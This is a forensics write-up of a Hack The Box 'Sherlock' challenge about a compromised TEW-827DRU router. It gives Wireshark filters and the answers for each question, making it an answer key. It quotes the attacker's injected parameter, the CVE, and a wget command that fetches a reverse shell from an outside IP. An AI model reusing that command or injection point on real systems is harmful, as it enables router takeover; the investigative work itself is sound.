Hello 4n6 Geeks is this Ahmed (OxAlpa) , and this is a simple write-up about trent sherlock from HTB
LEVEL : medium
Category : Forensics
Sherlock Scenario :
The SOC team has identified suspicious lateral movement targeting router firmware from within the network. Anomalous traffic patterns and command execution have been detected on the router, indicating that an attacker already inside the network has gained unauthorized access and is attempting further exploitation. You will be given network traffic logs from one of the impacted machines. Your task is to conduct a thorough investigation to unravel the attacker’s Techniques, Tactics, and Procedures (TTPs).
Q1-From what IP address did the attacker initially launched their activity?
- Firstly load the PCAP file into Wireshark .
- Now go to Statistics > Conversations >IPv4 :
- As you can see, there are a huge numbers of packets between the Router (192.168.10.1) and the attacker IP <192.168.10.2>
The Answer : 192.168.10.2Q2-What is the model name of the compromised router?
- Now use this Query to filter the HTTP packet between the router and attacker machine :
ip.addr==192.168.10.2 && ip.addr==192.168.10.1 && http
- Now Go to packet 13 and follow TCP stream :
The Answer : TEW-827DRUQ3-How many failed login attempts did the attacker try before successfully logging into the router?
- As you know, the authentication is done over HTTP protocol using POST method.
- So use this query :
ip.src==192.168.10.2 && ip.dst==192.168.10.1 && http.request.method==POST
- As shown In the first 3 packets the attacker tried to login into the router :
- So the attacker successfully log into the router after 2 failed attempts , as shown in packet 22826 :
The Answer : 2Q4-At what UTC time did the attacker successfully log into the routers web admin interface?
- From the above question we know the attacker successfully log into the router in packet 22826 :
The Answer : 2024-05-01 15:53:27Q5-How many characters long was the password used to log in successfully?
- From question 3, we know that the attacker managed to login without password :
The Answer : 0Q7-Which HTTP parameter was manipulated by the attacker to get remote code execution on the system?
- After the attacker logged into the router he managed to get a remote code execution with admin privileges using HTTP parameter <usbapps.config.smb_admin_name> as shown in packet 59466 :
The Answer : usbapps.config.smb_admin_nameQ8-What is the CVE number associated with the vulnerability that was exploited in this attack?
- Now you know the attacker got a remote code execution and we know the router model so just google it :
The Answer : CVE-2024-28353Q6-What is the current firmware version installed on the compromised router?
The Answer : 2.10Q9-What was the first command the attacker executed by exploiting the vulnerability?
- Easy one, just go to packet 44975 :
The Answer : Whoami Q10-What command did the actor use to initiate the download of a reverse shell to the router from a host outside the network?
The Answer : wget http://35.159.25.253:8000/a1l4m.shQ11-Multiple attempts to download the reverse shell from an external IP failed. When the actor made a typo in the injection, what response message did the server return?
- Now Follow TCP stream :
The Answer : Access to this resource is forbiddenThe End
Follow For More
